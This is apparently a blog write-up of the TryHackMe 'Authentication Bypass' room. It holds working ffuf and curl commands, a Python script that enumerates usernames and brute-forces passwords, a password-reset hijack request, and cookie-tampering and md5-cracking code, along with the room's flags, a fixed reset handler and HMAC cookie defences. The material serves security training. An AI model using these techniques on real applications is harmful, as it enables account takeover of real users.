Authentication Bypass - TryHackMe


Authentication bypass is a critical class of vulnerability: an attacker gets into an application, or into another user's account, without holding valid credentials, which exposes the sensitive information of legitimate users.

Username Enumeration:

Username enumeration is the technique of confirming which usernames or email addresses are already registered with an application, usually by abusing a feature whose response differs for existing and non-existing accounts.

Ffuf is a fast web fuzzer used for brute-forcing and enumeration. Given a wordlist and a rule for which responses to keep, it makes username enumeration both quick and reliable.

First, open the signup page on the target, enter admin as the username, fill in the remaining fields and click signup. The application responds with the error "An account with this username already exists". That error message is a username oracle: any name that triggers it belongs to a valid account.

To automate this I use the following command (each name in the wordlist is substituted for FUZZ, and -mr keeps only the responses whose body matches the error text):

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://Target_address/customers/signup -mr "username already exists"

The matched responses are the valid usernames.

Enumeration only confirms which accounts exist; the password for steve (thunder) comes from the follow-up step shown in the screenshot (not reproduced here): a password brute-force run with the enumerated usernames as the username list.
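The two-stage attack the ffuf command performs, as an added example that is not part of the original post or the TryHackMe room: stage one uses the "already exists" error as an oracle to enumerate accounts, stage two tries a password list only against the confirmed accounts. Everything here is constructed: the account table, the login error text and the wordlists are hypothetical, and the signup and login endpoints are in-process mocks so the script runs offline (a substring test stands in for ffuf's -mr regex). form_poster shows the same request shape against a live target but is not exercised.

```python
import urllib.error
import urllib.parse
import urllib.request

# Constructed mock of the target application (hypothetical accounts, not
# the room's real data).
MOCK_USERS = {"admin": "s3cret!", "steve": "thunder", "robert": "hunter2"}

EXISTS_MSG = "An account with this username already exists"
LOGIN_FAIL_MSG = "Your username or password is incorrect"   # constructed


def mock_signup(form):
    """Emulates POST /customers/signup: leaks whether the username is taken."""
    if form.get("username") in MOCK_USERS:
        return f'<p class="error">{EXISTS_MSG}</p>'
    return "<p>Account created</p>"


def mock_login(form):
    """Emulates POST /customers/login with a generic failure message."""
    if MOCK_USERS.get(form.get("username")) == form.get("password"):
        return "<p>Welcome back</p>"
    return f'<p class="error">{LOGIN_FAIL_MSG}</p>'


def enumerate_usernames(post, wordlist):
    """Stage one: a name is valid iff signup rejects it as a duplicate
    (the equivalent of ffuf -mr "username already exists")."""
    found = []
    for name in wordlist:
        body = post({"username": name, "email": "x", "password": "x", "cpassword": "x"})
        if EXISTS_MSG in body:
            found.append(name)
    return found


def brute_force_passwords(post, usernames, passwords):
    """Stage two: try each password only against confirmed usernames;
    success is the response that does NOT carry the login error."""
    creds = {}
    for user in usernames:
        for pw in passwords:
            if LOGIN_FAIL_MSG not in post({"username": user, "password": pw}):
                creds[user] = pw
                break
    return creds


def form_poster(url):
    """Returns a callable shaped like the mocks that POSTs a form to a
    live target (what ffuf does for each wordlist entry)."""
    def post(form):
        data = urllib.parse.urlencode(form).encode()
        req = urllib.request.Request(
            url, data=data,
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            return err.read().decode(errors="replace")
    return post


if __name__ == "__main__":
    names = ["alice", "admin", "bob", "steve", "robert", "mallory"]     # constructed wordlist
    passwords = ["password", "123456", "thunder", "hunter2", "s3cret!"]  # constructed wordlist
    users = enumerate_usernames(mock_signup, names)
    print("valid usernames:", users)
    print("credentials:", brute_force_passwords(mock_login, users, passwords))
```

Against a real target, swap the mocks for form_poster("http://Target_address/customers/signup") and form_poster("http://Target_address/customers/login"); the enumeration logic does not change.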

Logic Flaw:

A logic flaw is a bug in the application's intended workflow: a step that should be enforced server-side can be skipped or manipulated by an attacker, so the application ends up in a state its designers never intended.

Here is the practical demonstration of a logic flaw:

Submit the password reset form with the email address and username form fields filled in.

The application confirms that the reset message was sent successfully.

Next, replay the reset request from the terminal with curl and tamper with it so that the reset link is delivered somewhere else:

curl 'http://10.10.179.172/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'

Here {username} is the name of the account you registered yourself. The application checks that robert matches the email in the query string, but when it addresses the reset message it uses the email field from the POST body, which overrides the query-string value. Robert's reset link is therefore delivered to your own account, and that is where the flag comes from.

After sending the curl command, go to your own account and look under support tickets: the ticket contents are visible there.

Those contents include the reset link; following it logs you in as robert.
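A model of the reset-flow flaw the curl request above exploits, beside a fixed handler, as an added example that is not the room's source code: the vulnerable handler validates the username against the query-string email but takes the recipient from the merged request parameters, where the POST body wins. The account table, the attacker's address and the reset-link format are constructed for this example.

```python
import secrets

# Constructed account table (hypothetical addresses).
USERS = {
    "robert": "robert@acmeitsupport.thm",
    "attacker": "attacker@customer.acmeitsupport.thm",
}


def merged_params(query, form):
    """Models frameworks that expose query and body parameters through one
    lookup in which the POST body takes precedence: the root cause here."""
    params = dict(query)
    params.update(form)
    return params


def make_link(username):
    # Hypothetical link format, not the target's real one.
    return f"http://acmeitsupport.thm/customers/reset/{username}/{secrets.token_hex(16)}"


def vulnerable_reset(query, form):
    """Returns (recipient, link) the way the flawed application does."""
    username = form.get("username")
    # The ownership check uses the query-string email and is correct...
    if USERS.get(username) != query.get("email"):
        return None
    # ...but the recipient comes from the merged parameters, so an email
    # field in the body redirects robert's link to the attacker.
    recipient = merged_params(query, form)["email"]
    return recipient, make_link(username)


def fixed_reset(query, form):
    """Same flow, but the recipient is the address stored on the account,
    never a value supplied in the request."""
    username = form.get("username")
    if username not in USERS or USERS[username] != query.get("email"):
        return None
    return USERS[username], make_link(username)


# The request the curl command sends: one email in the URL, another in the body.
QUERY = {"email": "robert@acmeitsupport.thm"}
FORM = {"username": "robert", "email": "attacker@customer.acmeitsupport.thm"}

if __name__ == "__main__":
    print("vulnerable:", vulnerable_reset(QUERY, FORM))
    print("fixed:     ", fixed_reset(QUERY, FORM))
```

The fix is not to prefer the query string over the body; it is to stop reading the recipient from the request at all and use the account record as the only source of truth.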

Cookie Tampering:

Cookie tampering means editing the values the application stores in the client's cookies. When the server trusts those values without verifying them, changing them gets us into a session we were never authenticated for.

The endpoint below reports whether the server considers the request logged in; sent without a cookie, it reports that we are not:

curl http://target_ip/cookie-test

Resending the same request with a Cookie header that carries the modified plain-text values makes the server report that we are logged in as a user.

With the values changed this way the endpoint reveals the flag.

What is the flag from changing the plain text cookie values?

THM{COOKIE_TAMPERING}

What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?

I use CrackStation for this; it looks the hash up in a precomputed table of hashed values.

463729

What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?

THM{BASE64_ENCODING}

Encode the following value using base64: {"id":1,"admin":true}

eyJpZCI6MSwiYWRtaW4iOnRydWV9
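The three cookie forms the questions above cover, plus the defence they imply, as an added example that is not part of the original post: plain-text cookies are edited directly, base64 cookies are decoded, edited and re-encoded, hashed cookies are recovered by hashing candidate values (what CrackStation does with a precomputed table), and an HMAC over the cookie value is what stops all three edits. The cookie names logged_in and admin, the candidate wordlist and the server key are constructed; the base64 and md5 values are the ones from the questions.

```python
import base64
import hashlib
import hmac
import json

# Constructed signing key for the defence at the end (hypothetical; a real
# server keeps this secret and never sends it to the client).
SERVER_KEY = b"constructed-server-secret"


def tamper_plaintext(cookie, **changes):
    """Edit a plain-text cookie such as 'logged_in=false; admin=false'.
    The cookie names are constructed; substitute the target's own."""
    parts = dict(kv.split("=", 1) for kv in cookie.split("; "))
    parts.update({k: str(v).lower() for k, v in changes.items()})
    return "; ".join(f"{k}={v}" for k, v in parts.items())


def decode_b64_text(value):
    return base64.b64decode(value).decode()


def encode_b64_cookie(obj):
    # Compact separators reproduce exactly the JSON form in the question.
    return base64.b64encode(json.dumps(obj, separators=(",", ":")).encode()).decode()


def tamper_b64_cookie(value, **changes):
    """Decode, edit, re-encode: base64 is an encoding, not a protection."""
    obj = json.loads(base64.b64decode(value))
    obj.update(changes)
    return encode_b64_cookie(obj)


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def crack_md5(target_hex, candidates):
    """Dictionary attack: hashing is not encryption, so a short numeric id
    or a common word is recovered as soon as the wordlist contains it."""
    for cand in candidates:
        if md5_hex(cand) == target_hex:
            return cand
    return None


def sign_cookie(value):
    """Defence: append an HMAC over the value that the client cannot forge."""
    tag = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def verify_cookie(signed):
    """Returns the value if its tag verifies, None for any edited cookie."""
    value, _, tag = signed.rpartition(".")
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    print(tamper_plaintext("logged_in=false; admin=false", logged_in=True, admin=True))
    print(decode_b64_text("VEhNe0JBU0U2NF9FTkNPRElOR30="))
    print(tamper_b64_cookie(encode_b64_cookie({"id": 1, "admin": False}), admin=True))
    # Constructed candidate list; the hash is the one from the question.
    print(crack_md5("3b2a1053e3270077456a79192070aa78", ["123456", "password", "463729"]))
    forged = sign_cookie("admin=false").replace("admin=false", "admin=true")
    print(verify_cookie(sign_cookie("admin=false")), verify_cookie(forged))
```

Signing only proves the cookie was issued by the server; a signed cookie can still be replayed, so session state that must not leak (the admin flag, the user id) is better kept server-side and referenced by an opaque session identifier.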

Thank you for taking the time to read my blog; follow for more stories.
